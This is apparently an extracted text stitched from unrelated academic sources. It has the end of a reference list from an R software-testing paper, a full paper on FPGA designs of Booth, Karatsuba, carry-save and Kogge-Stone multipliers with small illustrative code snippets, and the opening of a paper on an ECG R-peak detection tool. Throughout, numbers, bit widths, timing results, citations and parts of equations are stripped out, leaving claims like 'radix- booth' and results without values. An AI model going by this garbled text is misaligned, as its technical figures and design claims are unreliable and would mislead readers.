proftools: profile output processing tools for r. available at https:// cran.r-project.org/package=proftools. tierney l, rossini aj, li n, sevcikova h. . snow: simple network of workstations. available at https://cran.r-project.org/package=snow. weston s. . dompi: foreach parallel adaptor for the rmpi package. available at https://cran. r-project.org/package=dompi. wickham h. . testthat: get started with testing. r journal : – . wickham h. a. profr: an alternative display for profiling information. available at https:// cran.r-project.org/package=profr. wickham h. b. advanced r. boca raton: chapman and hall/crc. wickham h, rstudio, feather developers, google, leveldb authors. . feather: r bindings to the feather “api”. available at https://cran.r-project.org/package=feather. wikipedia contributors. a. sunit — wikipedia, the free encyclopedia. available at https://en.wikipedia.org/w/index.php?title=sunit&oldid= . wikipedia contributors. b. xunit — wikipedia, the free encyclopedia. available at https://en.wikipedia.org/w/index.php?title=xunit&oldid= . wilson g. . software carpentry: lessons learned. f research : doi . /f research. - .v . wilson g, aruliah da, brown ct, hong npc, davis m, guy rt, haddock shd, huff kd, mitchell im, plumbley md, waugh b, white ep, wilson p. . best practices for scientific computing. plos biology ( ):e doi . /journal.pbio. . russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.r-project.org/ https://www.ranorex.com https://docs.microsoft.com/en-us/dotnet/core/testing/unit-testing-best-practices https://docs.microsoft.com/en-us/dotnet/core/testing/unit-testing-best-practices https://robinsones.github.io/making-r-code-faster-a-case-study/ https://robinsones.github.io/making-r-code-faster-a-case-study/ http://www.crn.com/news/security/ /microsofts-ceo- - -rule-applies-to-bugs-not-just-features.htm http://www.crn.com/news/security/ /microsofts-ceo- - -rule-applies-to-bugs-not-just-features.htm http://dx.doi.org/ . /journal.pcbi. https://www.seleniumhq.org http://iansommerville.com/systems-software-and-technology/giving-up-on-test-first-development/ http://iansommerville.com/systems-software-and-technology/giving-up-on-test-first-development/ https://stackoverflow.com/questions/ /unit-testing-anti-patterns-catalogue https://cran.r-project.org/package=proftools https://cran.r-project.org/package=proftools https://cran.r-project.org/package=snow https://cran.r-project.org/package=dompi https://cran.r-project.org/package=dompi https://cran.r-project.org/package=profr https://cran.r-project.org/package=profr https://cran.r-project.org/package=feather https://en.wikipedia.org/w/index.php?title=sunit&oldid= https://en.wikipedia.org/w/index.php?title=xunit&oldid= http://dx.doi.org/ . /f research. - .v http://dx.doi.org/ . /journal.pbio. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ xie y. . testit: a simple package for testing r packages. available at https://cran.r-project.org/ package=testit. xie y, allaire jj, grolemund g. . r markdown: the definitive guide. boca raton: chapman and hall/crc. xochellis j. . the impact of the pareto principle in optimization - codeproject. available at https://www.codeproject.com/articles/ /the-impact-of-the-pareto-principle- in-optimization. yu h. . rmpi: parallel statistical computing in r. r news : – . russell et al. ( ), peerj comput. sci., doi . /peerj-cs. 
international journal of advanced network, monitoring and controls

radix- design alternatives of fast two operands interleaved multiplication with enhanced architecture, with fpga implementation & synthesis of a -bit wallace tree csa based radix- booth multiplier

mohammad m. asad, king faisal university, department of electrical engineering, ahsa, saudi arabia, e-mail: asadmosab@gmail.com
ibrahim marouf, king faisal university, department of electrical engineering, ahsa, saudi arabia, e-mail: i.marouf@outlook.com
qasem abu al-haija, department of computer information and systems engineering, tennessee state university, nashville, usa, e-mail: qabualha@my.tnstate.edu

abstract—in this paper, we propose different comparable reconfigurable hardware implementations of a fast two-operand radix- multiplier coprocessor using the karatsuba method and the booth recording method, employing carry save adders (csa) and kogge-stone adders (ksa) in a wallace tree organization. the proposed designs were implemented for a target fpga device family and synthesized with the vendor's design and simulation package. the designs were benchmarked in terms of maximum operational frequency, total path delay, total design area, and total thermal power dissipation. the experimental results revealed that the best multiplication architecture was the wallace tree csa based radix- booth multiplier (wcbm), for which the critical path delay, maximum operational frequency, hardware design area (number of logic elements), and total thermal power dissipation were recorded. consequently, the wcbm method can be efficiently employed to enhance the speed of computation for many multiplication-based applications such as embedded system designs for public key cryptography.

keywords—cryptography; computer arithmetic; fpga design; hardware synthesis; kogge-stone adder (ksa); radix- booth recording; karatsuba multiplier; wallace tree

i. introduction

recently, the vast expansion in the field of information and communication technology (ict), such as grid and fog computing, has increased the inclination towards sharing secret data over existing non-secure communication networks. this has encouraged researchers to propose different solutions to ensure the safe access and storage of private and sensitive data by employing different cryptographic algorithms, especially public key algorithms [ ], which have proved robust against most attacks and security holes. public key cryptography is significantly based on the use of number theory and digital arithmetic algorithms. indeed, a wide range of public key cryptographic systems have been developed and embedded using hardware modules due to their better performance and security. this has increased the demand for embedded and system-on-chip (soc) [ ] technologies employing several computer-aided design (cad) tools along with configurable hardware processing units such as field programmable gate arrays (fpga) and application specific integrated circuits (asic). therefore, a considerable number of embedded coprocessor designs have been used to replace software-based (i.e., programming-based) solutions in different applications such as image processors, cryptographic processors, digital filters, low-power applications such as [ ], and others. the major part of designing such processors significantly encompasses the use of computer arithmetic techniques in the underlying layers of processing.
computer arithmetic [ ], or digital arithmetic, is the science that combines mathematics with computer engineering and deals with representing integers and real values in digital systems and with efficient algorithms for manipulating such numbers by means of hardware circuitry and software routines. arithmetic operations on a pair of numbers x and y include addition (x + y), subtraction (x − y), multiplication (x × y), and division (x / y). subtraction and division can be viewed as operations that undo the effects of addition and multiplication, respectively. the multiplication operation is considered a core operation that affects the performance of any embedded system; therefore, the use of fast multiplier units results in enhancements of the overall system performance. recently, several solutions have been proposed for multiplication algorithms, while few of them are efficient [ ]. a multiplication algorithm [ ] is a method to find the product of two numbers, i.e., p = x × y. multiplication is an essential building block for several digital processors as it requires a considerable amount of processing time and hardware resources. depending on the size of the numbers, different algorithms are in use. the elementary-school algorithm multiplies the two numbers digit by digit, producing partial sums, with complexity o(n²) [ ]. for larger numbers, more efficient algorithms are needed; for example, if the integers to be multiplied are k bits long, the schoolbook method requires on the order of k² digit multiplications. more efficient and practical multiplication algorithms will be discussed in the following subsections. in this paper, we report on several fast alternative designs for a radix- based multiplier unit including: a radix- csa based booth multiplier, a csa based radix- booth with wallace tree karatsuba multiplier, a csa based radix- booth with ksa based karatsuba multiplier, a csa based radix- booth with comparator karatsuba multiplier, a sequential -bit csa based radix- booth multiplier, and a -bit wallace tree csa based radix- booth multiplier (wcbm). the remainder of this paper is organized as follows: section ii discusses the core components of efficient multiplier design, section iii provides the proposed design alternatives of the radix- based multiplier, section iv presents the synthesis results and analysis, and, finally, section v concludes the paper.

ii. core design components - review

two-operand multiplication is a substantial arithmetic operation since it plays a major role in the design of many embedded and digital signal processors [ ]. therefore, the efficient design and implementation of a fast multiplier unit is in demand. in this paper, we propose a competitive reconfigurable multiplier design using scalable and efficient modules. thus, the following subsections review the core design components for the proposed multiplier implementation unit.

figure: carry save adder: (a) top view design (b) internal architecture

a. carry save adder (csa)

the csa [ ] is a fast redundant adder with a constant carry-path delay regardless of the number of operand bits. it produces the result as two vectors: a sum vector (the partial sum) and a carry vector (the partial carry). the advantage of the csa is that its speed is constant regardless of the number of bits; however, its area increases linearly with the number of bits.
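the carry-save idea is easy to check numerically: the sum vector is the bitwise xor of the three inputs, the carry vector is their bitwise majority shifted left by one position, and adding those two vectors with an ordinary adder reproduces the full sum. a small sketch in r (using base bitwise operators, purely to illustrate the arithmetic rather than the hardware):

# carry-save addition of three integers x, y, z:
#   sum vector   = x xor y xor z              (per-bit sum, ignoring carries)
#   carry vector = majority(x, y, z) << 1     (carries, moved to the next bit position)
csa <- function(x, y, z) {
  sum_vec   <- bitwXor(bitwXor(x, y), z)
  carry_vec <- bitwShiftL(bitwOr(bitwOr(bitwAnd(x, y), bitwAnd(x, z)), bitwAnd(y, z)), 1)
  c(sum = sum_vec, carry = carry_vec)
}

out <- csa(13L, 7L, 9L)
# a single conventional (carry-propagate) addition finishes the job
stopifnot(out["sum"] + out["carry"] == 13L + 7L + 9L)

because each output bit depends only on the three input bits in the same position, the sum and carry vectors are produced with a single full-adder delay regardless of operand width, which is exactly the constant-delay property described above and the reason the csa is used inside the wallace tree organization discussed later.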
the top view of the csa unit along with its internal logic design architecture are provided in fig. below. in this work, we have implemented the csa adder using vhdl code for different bit sizes ranges from - bits through -bits [ ]. the synthesize results of total delay in ( ) and area in logic elements (les) were analyzed and reported in [ ] and they are illustrated in fig. . these results were generated using software [ ], simulated for model [ ] and they highly conform theoretical evaluation of csa operation since the delay time is almost equal for all bits. however, the area is almost double for each number of bits. also, the timing estimation of csa was generated via time analyzer tool provided in the package. accordingly, the critical path delay is which is data arrival time while the data delay is only . ns which provide a frequency of .finally, to verify the performance of csa, we have compared it with the well-known carry lockahead adder (cla) in terms of area and delay. cla is a carry propagation international journal of advanced network, monitoring and controls volume , no. , adder (cpa) with logarithmic relation between the carry propagation delay and the number of bits in operands. figure . delay-area analysis of csa vs cla implementations ( – bit) the simulation results of both csa and cla is provided in fig. shows that csa is superior in both area and speed. it has almost a constant time delay and relatively less area than cla. whereas cla time delay increases as the number of bit increases but not much as the area size. b. kogge-stone adder (ksa) ksa is a fast two operands parallel prefix adder (ppas) [ ] that executes addition on parallelized manner. ppas are just like cla but with an enhancement in the carry propagation stage (called the middle stage). there are five different variations of ppas namely: ladner-fischer adder (lfa), brent- kung adder (bka), kogge-stone adder (ksa), hans-carlson adder (hca), and sklansky adder (ska). these adders differ by the tree structure design to optimize certain aspects such as, performance, power, area size, and fan in/out. to verify the performance of all ppas, we have implemented them on fpga and the experimental results [ ] showed that ksa utilizes larger area size to achieve higher performance comparing among all other five ppas. thus, we decided to consider ksa as our basic carry propagation adder (cpa) to finalize the redundant results and to build up many other units that are in-need for conventional adder. in short, the simulation results of [ ] showed that ksa leading the other adders as it has the smallest time delay with only . . this result is very useful and conforms the theatrical modeling of ksa which has the least number of logic levels. like all ppas, ksa functionality consists of three computational stages as illustrated in fig. , as follows:  pre-processing stage: the computation of generate and propagate of each bit from a and b are done in this step. these signals are given by the logic equations: and  carry generation network: ppa differentiates from each other by the connections of the network. it computes carries of each bit by using generate and propagate signals from previous block. in this block two blocks are defined group generation and propagation (ggp), in addition to group generation only (ggo), as shown in fig. . 
logic blocks used for the calculation of the group generate and propagate bits can be described by the following logic equations: g = g_left + (p_left . g_right) and p = p_left . p_right, while the generation-only (ggo) group needs the single carry-generation equation g = g_left + (p_left . g_right). post processing (calculating the sum): this is the last step and is common to all adders of this family (carry look-ahead). it involves the computation of the sum bits, which are given by s[i] = p[i] xor c[i-1]. the top view and the internal logic circuit are provided in fig. . c. fast multi-operands addition. the addition operation is not commonly used to add two operands only; instead, it is mostly involved in multiplication and inner-product computations [ ]. the use of regular two-operand adders leads to intermediate results before the final answer is obtained, which affects the performance (time delay) of a system. therefore, multi-operand adders are mainly studied to reduce this problem. wallace and dadda trees [ ] are considered two variations of high-performance multi-operand addition. fig. shows the dot notation used to represent the digit positions or alignments (instead of using the values, which is quite useful) for multi-operand addition in multiplication and inner-product computation. figure . kogge stone adder: (a) top view design of ksa (b) ksa stages (c) group generation and propagation. in this work, we have adopted a csa based wallace tree since it confirmed a better operand organization to improve the total addition delay [ ]. we have implemented two csa wallace trees: -operands addition and -operands addition. the structural logic diagram of the -operands tree is given in fig. ; the wallace tree unit is designed behaviorally (an fsm is generated). figure . dot notation of multi-operand addition for multiplication and inner-product computation. d. karatsuba multiplier. to enhance the performance of multiplication for large operands (i.e. -bit size), a re-organization process can be adopted for the multiplication operands to exploit the maximum possible parallelism and shorten the multiplication time. the karatsuba algorithm [ ] is a pipelined multiplication process used mainly to construct high-precision multipliers from multiple small-precision multiplier blocks by exploiting the maximum available parallelism between the multiplication blocks. the basic idea of the karatsuba algorithm is illustrated in fig. and can be stated as follows: let x and y be integers, b the base (radix) and n the number of digits; then ) re-write the operands as x = x1 . b^(n/2) + x0 and y = y1 . b^(n/2) + y0, and ) calculate the product as x . y = z2 . b^n + z1 . b^(n/2) + z0, where z2 = x1 . y1, z0 = x0 . y0 and z1 = x1 . y0 + x0 . y1. a more efficient implementation of karatsuba multiplication computes the middle term with a single multiplication, z1 = (x1 + x0) . (y1 + y0) - z2 - z0 (equivalently, z1 = z2 + z0 - (x1 - x0) . (y1 - y0)), so that only three half-size multiplications are needed. figure . multi-operand addition for operands. figure . aligning partial products. e. magnitude comparator. the magnitude (or digital) comparator is a hardware electronic device that takes two numbers as input in binary form and determines whether one number is greater than, less than or equal to the other. as in binary addition, an efficient comparator can be implemented using g (generate) and p (propagate) style signals for the comparison. basically, for a two-bit slice the comparator outputs bbig and eq can be realized by: bbig = (a1' . b1) + (a1 xnor b1) . (a0' . b0) and eq = (a1 xnor b1) . (a0 xnor b0). for a<b, "bbig, eq" is "1, 0"; for a=b, "bbig, eq" is "0, 1"; hence, for a>b, "bbig, eq" is "0, 0", where bbig is defined as the output a less than b (a_lt_b). comparing these equations with the carry signal of a binary adder, cout = a . b + (a xor b) . cin = g + p . cin, where a and b are the binary inputs, cin is the carry input, cout is the carry output, and g and p are the generate and propagate signals respectively, we get the per-bit comparator signals g = a' . b and eq = a xnor b, while cin can be considered as the generate signal of the less-significant stage. for this, the encoding equations are given per bit as g[i] = a[i]' . b[i] and eq[i] = a[i] xnor b[i]. substituting these values into the two-bit slice equations results in bbig[2j+1:2j] = g[2j+1] + eq[2j+1] . g[2j] and eq[2j+1:2j] = eq[2j+1] . eq[2j]. the bbig and eq signals can be further combined to form group bbig and eq signals in the same pairwise way, i.e. for a wider comparator bbig[high:low] = bbig[high half] + eq[high half] . bbig[low half] and eq[high:low] = eq[high half] . eq[low half]. fig. shows the complete design of an -bit comparator as an example of this technique, where i and j index the bit positions and bit pairs, respectively. iii. proposed multiplier design alternatives. fundamentally, the multiplication operation (along with fast addition) is a significant unit in almost all cryptographic coprocessors. for instance, in the design of the ssc crypto-processor [ ], the multiplication is primarily used to compute the squared parameter of the public key and the modulus. also, in the design of an rsa crypto-processor, the multiplier is used to compute the modulus (n = p . q) and the euler function (phi(n) = (p - 1) . (q - 1)) [ ]. one more example is the need for fast multipliers at several computation stages of an ecc cryptosystem [ ]. indeed, a wide range of methods have been proposed to address the efficient design of a fast two-operands arithmetic multiplier. in this paper, we have spent extensive time designing an efficient multiplier by trying several variations of different multiplier design specifications. the first design was the implementation of a radix- booth encoding multiplier. then, we tried many variations that employ this multiplier with different design methods. in the next subsections, we provide six design alternatives of the proposed multiplier to arrive at the most cost-effective multiplier design, and we finally report on the implemented design. figure . the complete design of the -bit comparator including the pre-encoding circuit and the comp circuit. a. radix- csa based booth multiplier. unlike the binary radix- booth encoder, the radix- booth encoder encodes each group of three bits as shown in table . the encoding technique uses shift operations to produce the power-of-two multiples of the multiplicand, while any remaining multiple is obtained by a single addition. the logic diagram of the csa based radix- booth multiplier is shown in fig. . the use of csa provides very powerful performance with limited area cost. the number of partial products for radix- is n (where n is the number of operand bits), whereas for radix- the number of partial products is only n/ . table i. radix- booth encoding: each group of multiplier bits selects a partial product ppri equal to a small signed multiple of the multiplicand a. as can be seen from fig. , the multiplier accepts two -bit operands and stores one operand in a shift register to select the group bits used in encoding, whereas the other operand is processed by the booth encoder. the output of the encoding stage is added via the sequential csa adder and the result is provided in a redundant representation (vector sum and vector carry).
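as an illustration of the recoding principle (the exact radix and bit counts were lost in the text extraction, so the sketch below uses radix-4 booth recoding with overlapping three-bit groups; the paper's higher-radix encoder works analogously), each group of multiplier bits is turned into one small signed multiple of the multiplicand, and the resulting partial products are exactly what the csa accumulates:

```python
# illustrative sketch (python): radix-4 booth recoding of the multiplier into
# signed digits in {-2, -1, 0, 1, 2}. the paper's encoder uses a higher radix
# (the exact figures were lost in extraction), but the principle is identical:
# each overlapping bit group selects one small signed multiple of the
# multiplicand, so far fewer partial products have to be accumulated.
def booth_radix4_digits(multiplier, n_bits):
    digits, prev = [], 0                      # prev is the implicit bit right of the lsb
    for i in range(0, n_bits, 2):
        b2 = (multiplier >> (i + 1)) & 1
        b1 = (multiplier >> i) & 1
        digit = -2 * b2 + b1 + prev           # booth digit of the overlapping group
        digits.append(digit)
        prev = b2
    return digits

def booth_multiply(a, x, n_bits):
    product = 0
    for k, d in enumerate(booth_radix4_digits(x, n_bits)):
        product += (d * a) << (2 * k)         # partial products; hardware sums them with csa trees
    return product

assert booth_multiply(23, 57, 8) == 23 * 57
```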
radix- booth encoder x shift register a csa_ bit partial sumpartial carry figure . design of radix- booth -bit multiplier reset mul_gen csa store data output start enable i<= i> figure . state machine diagram for -bit booth multiplier. also, fig. illustrates the fsm diagram of -bit booth multiplier. it starts with reset_state, where all signals and variables are cleared (i.e. reset). next state is mul_gen, where encoding is occurred. after that, the generated vector is added to the previous results of csa state. fourth, results are stored in store_state and moves back to mul_gen state in loop until all the bits are selected and encoded. finally, the output results are provided in output state.note that in radix- encoding the number of generated partial product vectors are computed by dividing the number of bits over , since each three bits are selected and used for encoding. b. csa based radix- booth, wallace tree karatsuba multiplier in this method, we combine the benefits of the bit reduction of radix booth along with the parallelism of csa based wallace tree as well as the pipelining process of karatsuba multiplication. thus, this design achieved minimum path delay and minimized area (i.e. the best performance). however, redundancy in this design produced one critical problem regarding the middle carry at the edges of blocks that affects the results. fig. illustrates the flow diagram for this design. here, we first designed a -bit karatsuba multiplier using a -bit csa based radix- booth for partial products calculation (as for our target design and since we are implementing -bit multiplier; m was chosen to be bits (half size)). first, the entered two operands are divided into halves . next, they are fed into the booth multiplier to compute the partial products as given in karatsuba formula. since the results are redundant and we have partial products according to karatsuba: . thus, partial products are generated. in the final stage, a csa based wallace tree was implemented to be used for adding the resulted partial products. final result is represented redundantly as vector sum and vector carry. this design achieves minimum path delay with limited area. however, redundancy in this design produces one critical problem that affects the results. as a rule-of- thumb, if we multiply two numbers (i.e. p and q), the multiplication result will be increased to . however, this is not the case when using redundant systems since the result is stored as two vectors and adding the two vectors to we tend to obtain the conventional product might result in . this additional bit brings up a new problem in the preliminary design. now, this problem can be solved by discarding the last carry when converting back to conventional representation. however, in karatsuba algorithm the numbers are split into -bit (original size is ). the result must be - bit, but in karatsuba case will be partial product vectors of -bit shifted in such a way that adding those vectors will result in -bit. thus, discarding all the generated carry when converting back to conventional system leads to error since only the carry generated of adding the two vectors corresponding to international journal of advanced network, monitoring and controls volume , no. , the same variable (or the same partial product in this case) needs to be discarded. other generated carries must be considered. fig. . demonstrate this problem graphically. generate karatsuba operands bit rad. 
booth multiplication four levels csa tree input two bit operands output bit sum and carry vectors operands bit vectors bit figure . design of -bit csa based radix- booth, wallace tree karatsuba multiplier. -bit booth radix- -bit booth radix- -bit booth radix- x=x b+x , -bit ( -bit each) y=y b+y , -bit ( -bit each) x y x y (x -x ) (y -y ) ps pc ps pc ps pc b (ps , pc ) b(ps , pc ) b(ps , pc ) (ps , pc ) b(ps , pc ) figure . graphical approaches to demonstrate the carry error (the mid-carry problem), here we have two cases:case i- ps + pc = might result in carry, result = -bit (wrong). carry must be discarded and case ii- ps + ps = might result in carry, result = -bit (correct). carry must be considered. eventually, the mid-carry problem was solved by either using -bit csa based radix- booth, ksa based karatsuba multiplier or using -bit csa based radix- booth, with comparator karatsuba multiplier. however, both solutions have added more overhead to design cost; therefore, this solution has been excluded. both solutions are discussed in the following subsections. ) csa based radix- booth, ksa based karatsuba multiplier. international journal of advanced network, monitoring and controls volume , no. , since the carry to be eliminated is the generated one from booth multiplier, a first thought is to exchange the csa adder with ksa adder to convert back the two vectors into one -bit number and discard any generated carry. all the vectors are reduced into five -bit vectors in parallel. this stage helps to eliminate the false carry without the need to do any further examination. ksa is a fast adder, thus this design maintains its high performance utilizing more logic elements. the logic diagram of the design is shown in fig. . ) csa based radix- booth, with comparator karatsuba multiplier. another noticeable design option can solve the mid- carry problem is to use a -bit comparator to test if the two vectors will generate a carry if yes, then do the correction step before input the vectors to csa tree. after booth multiplication stage, connect the vector sum and vector carry that may produce carry error to the inputs of -bit comparator unit, then perform correction if needed. finally, all vectors added using csa tree. the complete solution is depicted in fig. . generate karatsuba operands bit rad. booth multiplication bit ksa adder input two bit operands output bit sum and carry vectors three levels csa adder operands bit vectors bit operands bit figure . design of -bit: -bit csa based radix- booth, ksa based karatsuba multiplier. generate karatsuba operands bit rad. booth multiplication bit carry generate and kill input two bit operands bit comparator correction circuit five levels csa tree output bit sum and carry vectors operands bit vectors bit vectors bit vectors bit figure . karatsuba multiplication based on csa and comparator. note that the -bit comparator can be built with stages in total recording a total delay of level gate delay and area of gates (like the design of -bit comparator discussed in section. . ). to predict whether the carry will be generated or not, then we need to generate -bit g (generate) and k (kill) vectors. thus, we have three cases which might happen as follows:  case i: when . the carry is propagated. here we need to define the first carry state before . if the state is , then the vector does not need any correction. but, if the state is a state, then we need to subtract one from the highest bit (msb) of any vector to prevent the carry to .  case ii:when . 
here we have a state, so that no need to correction.  case iii:when .here is a state and a correction is needed. if this happed at highest bit (msb), then it needs to subtract ones. but if it after some , then this is case i. to define the first case, we have used a comparator to compare the two vectors as the comparator results:  : generate state happened first or it is the first state after propagation  : kill state happened first or it is the first state after propagation international journal of advanced network, monitoring and controls volume , no. ,  all states are propagating states, no need for correction because we do not have input carry ) comparisons between design ii & design iii we investigated both proposed design alternatives of karatsuba based multiplication theoretically in terms of critical path delay (using gate delay unit) and the area of the multiplier (how many gates used in the implementation). the results are shown in table below. table ii. comparison between design ii & design iii. design solutions # delay (gate delay) % optimization area (# of gates) % optimization solution i: using ksa adder. + % solution ii: using comparator unit. + % c. sequential -bit csa based radix- booth multiplier this design is accomplished by expanding the - bit booth to -bit. the two modules (i.e. -bit and -bit booth) differ only in the number of generated partial products. since radix- is used, partial products are generated in the new module instead of while other logic components remained the same. fig. shows the logic diagram of new -bit implementation. this design was implemented and was simulated on altera fpga kit recording a path delay of . ns for one loop and since the program runs times(i.e. partial products), thus the total path delay is . ns. also, this multiplier requires logic elements (les). radix- booth encoder x shift register a csa_ bit partial sumpartial curry figure . design of csa based radix- booth -bit multiplier. iv. synthesize results and analysis to speed up the performance of sequential -bit csa based radix- booth multiplier, we parallelized the addition of partial products produced in the same level by using wallace csa tree instead of sequential csa to exploit the maximum possible parallelism between the partial products to gain in speed and enhance the design performance. that’s it, we end up with implementing a -bit wallace tree csa based radix- booth multiplier (wcbm). the block diagram for the proposed design is shown in fig. . (a). the comparison with the other design alternatives showed that wallace tree csa based radix- booth multiplier (wcbm) has decreased the total delay and increased the operational speed for the multiplication operation. also, the design is modified to increase the frequency be dividing the program to three main states. the top view of our implemented wcbm unit is given in fig. . (b). it’s clearly seen that wcbm unit is triggered by clk signal along with enable line. the generated number can be obtained from the output portliness “sum” which is bits. besides the unit encompasses three control input signals (enable, reset, clk) and two control output signals (ack and ready). moreover, the finite state machine (fsm) diagram for the implemented wcbm is shown in fig. . (c). 
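before walking through the fsm phases in detail, a rough software sketch (python; an illustration, not the implemented vhdl) of the same data path may help: booth partial products are compressed level by level with 3:2 carry-save adders until only two vectors remain, and one final carry-propagate addition (a kogge-stone adder in the hardware design) produces the conventional result:

```python
# sketch (python, illustration only) of the wcbm data path: booth partial
# products -> levels of 3:2 carry-save compressors -> two vectors -> one final
# carry-propagate addition (a kogge-stone adder in the hardware design).
def csa(x, y, z):
    return x ^ y ^ z, ((x & y) | (x & z) | (y & z)) << 1

def wallace_reduce(operands):
    """compress any number of operands into a redundant (sum, carry) pair."""
    ops = list(operands)
    while len(ops) > 2:
        nxt, rem = [], len(ops) % 3
        for i in range(0, len(ops) - rem, 3):      # one compressor per group of three
            s, c = csa(ops[i], ops[i + 1], ops[i + 2])
            nxt += [s, c]
        ops = nxt + (ops[-rem:] if rem else [])    # operands left over at this level
    return ops[0], (ops[1] if len(ops) > 1 else 0)

partial_products = [0x1F, 0x3C0, 0x5A00, 0x70000, 0x81]   # arbitrary example vectors
s, c = wallace_reduce(partial_products)
assert s + c == sum(partial_products)                      # the final cpa step
```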
fsm consists of three main phases: partial product generation (initially, partial products are generated by using radix- booth encoding), wallace tree phase (these partial products are added by using levels wallace tree csa based) and ksa phase (because the result is redundant, ksa is used in the last phase to convert it to conventional result). finally, fig. . illustrates a sample numerical example of the proposed wcbm that is generated from quartus ii simulation tool. international journal of advanced network, monitoring and controls volume , no. , generate booth partial products csa tree ( levels) input two bit operands output bit sum and carry vectors pp bit vectors bit figure . (a) design architecture of wcbm (a) top level diagramwcbm (c) fsm diagram for wcbm. figure . sample run example of wcbm process of two -bit numbers international journal of advanced network, monitoring and controls volume , no. , the proposed multiplier implementation has been synthesized using altera cyclone ep cgx- cf c fpga kit to analyze several design factors such as design area, the total delay of the multiplication unit and the thermal power consumption of fpga implementation. we have evaluated the performance of the -bit wallace tree csa based radix- booth multiplier wcbm module for different data path sizes. timing analysis of the critical clock cycle for the implemented wcbm is illustrated in fig. . it can be seen from the graph that the critical path delay is . ns in which . ns for the clock delay and . ns for the data delay. this give a maximum frequency for the circuit of . mhz.in addition, the area of the design has recorded a constant number of logic elements (i.e. les) with the total thermal power dissipation estimated by using powerplay power analyzer tool of quartus ii software of . mw. figure . waveform sample of the proposed wcbm data delay v. conclusions and remarks multiplication operation is a core operation that domineer the performance of several public cryptographic algorithms such as rsa and ssc. in this paper, we have thoroughly discussed several design alternatives of radix- based multiplier unit by employing the karatsuba method and booth recording method with carry save and kogge stone adders on wallace tree organization. the proposed designs were evaluated in terms of many aspects including: maximum frequency and critical path delay, design area, and the total fpga power consumption. the proposed hardware cryptosystem design is conducted using altera cyclone fpga design technology along with the help of cad package of altera such as quartus ii and modelsim . . to sum up, we have successfully implemented and synthesized the wallace tree csa based radix- booth multiplier (wcbm) module via the target fpga technology for -bits. the synthesizer results showed an attractive results in terms of several design factors that can improve the computation performance for many multiplication based applications. references [ ] a.j. menezes, p.c. van oorschot and s.a. vanstone. ( ). handbook of applied cryptography”, crc press, boca raton, florida. [ ] k. javeed, x. wang and m. wang, 'serial and parallel interleaved modular multiplierson fpga platform', ieee th international conference on field programmable logic and applications (fpl), https://doi.org/ . /fpl. . [ ] d. j greaves, system on chip design and modelling, university of cambridge, computer laboratory, lecture notes, . http://www.cl.cam.ac.uk/teaching/ /sysonchip/socdam- notes .pdf. [ ] m. d. ercegovac and t. 
lang, ( ) 'digital arithmetic', morgan kaufmann publishers, elsevier, vol. , p.p. - . http://www.sciencedirect.com/science/book/ international journal of advanced network, monitoring and controls volume , no. , [ ] qasem abu al-haija, sharifah m. s. ahmad, "fast radix- sequential multiplier using kintex- fpga chip family", the open cybernetics & systemics journal, bentham open, vol. , . [ ] mohammed mosab asad, ibrahim marouf, qasem abu al-haija, "review of fast multiplication algorithms for embedded systems design", international journal of scientific & technology research volume , issue , . [ ] heath, steve ( ). embedded systems design. edn series for design engineers ( ed.). newnes. p. . isbn - - - - . an embedded system is a microprocessor based system that is built to control a function or a range of functions. [ ] i. marouf, m. m. asad, a. bakhuraibah and q. a. al-haija, "cost analysis study of variable parallel prefix adders using altera cyclone iv fpga kit," international conference on electrical and computing technologies and applications (icecta), ras al khaimah, , pp. - .doi: . /icecta. . [ ] altera co., “introduction to quartus ii software: ver . ”, intel quartus ii mnl- - . , . [ ] altera corporation, “cyclone iv device handbook”, vol. , cyiv- v - . , https://www.altera.com/, . [ ] s. butchibabu, s. kishore bab ( ). design and implementation of efficient parallel prefix adders on fpga, international journal of engineering research & technology, vol. issue no. . [ ] b. parhami, ( ), “computer arithmetic: algorithms and hardware designs”, oxford university press, oxford. [ ] d. purohit, h. joshi, ( ), ‘comparative study and analysis of fast multipliers’, international journal of engineering and technical research (ijetr), vol. , no. , . [ ] a. karatsuba and y. ofman, ( ) ‘multiplication of multidigit numbers on automata’, soviet physics, doklady, p.p. - . https://www.researchgate.net/publication/ _multiplication_ of_multidigit_numbers_on_automata [ ] qasem abu al-haija, mohamad m.asad, ibrahim marouf,"a systematic expository review of schmidt-samoa cryptosystem", international journal of mathematical sciences and computing(ijmsc), vol. , no. , pp. - , .doi: . /ijmsc. . . [ ] qasem abu al-haija, mahmoud smadi, monther al-ja’fari, abdullah al-shua’ibi, "efficient fpga implementation of rsa coprocessor using scalable modules", procedia computer science, elsevier, vol , . [ ] qasem abu al-haija, mohammad alkhatib, azmi b jaafar, "choices on designing gf(p) elliptic curve coprocessor benefiting from mapping homogeneous curves in parallel multiplications", international journal on computer science and engineering, engg journals publications, vol. , no. , . r-deco: an open-source matlab based graphical user interface for the detection and correction of r-peaks r-deco: an open-source matlab based graphical user interface for the detection and correction of r-peaks jonathan moeyersons , matthew amoni , , sabine van huffel , rik willems , and carolina varon stadius center for dynamical systems, signal processing and data analytics, department of electrical engineering (esat), ku leuven, leuven, belgium department of cardiovascular sciences, ku leuven, leuven, belgium department of cardiology, university hospitals leuven, leuven, belgium abstract many of the existing electrocardiogram (ecg) toolboxes focus on the derivation of heart rate variability features from rr-intervals. by doing so, they assume correct detection of the qrs-complexes. 
however, it is highly likely that not all detections are correct. therefore, it is recommended to visualize the actual r-peak positions in the ecg signal and allow manual adaptations. in this paper we present r-deco, an easy-to-use graphical user interface (gui) for the detection and correction of r-peaks. within r-deco, the r-peaks are detected by using a detection algorithm which uses an envelope-based procedure. this procedure flattens the ecg and enhances the qrs-complexes. the algorithm obtained an overall sensitivity of . % and positive predictive value of . % on the mit/bih arrhythmia database. additionally, r-deco includes support for several input data formats for ecg signals, three basic filters, the possibility to load other r-peak locations and intuitive methods to correct ectopic, wrong, or missed heartbeats. all functionalities can be accessed via the gui and the analysis results can be exported as matlab or excel files. the software is publicly available. through its easy-to-use gui, r-deco allows both clinicians and researchers to use all functionalities, without previous knowledge. subjects computational biology, algorithms and analysis of algorithms, data science, graphics, visual analytics keywords r-peak detection, r-peak correction, user interface, analysis software introduction the electrocardiogram (ecg) is one of the primary screening and diagnostic tools of the cardiologist. it records the electrical activity of the heart, which generates the myocardial contractions. a crucial step in the study of the ecg is the location of the qrs-complexes. as can be seen in fig. , these complexes are the most prominent waveforms in the ecg. they contain an enormous amount of information about the state of the heart. this is why the detection of the qrs-complexes constitutes the basis for almost all automated 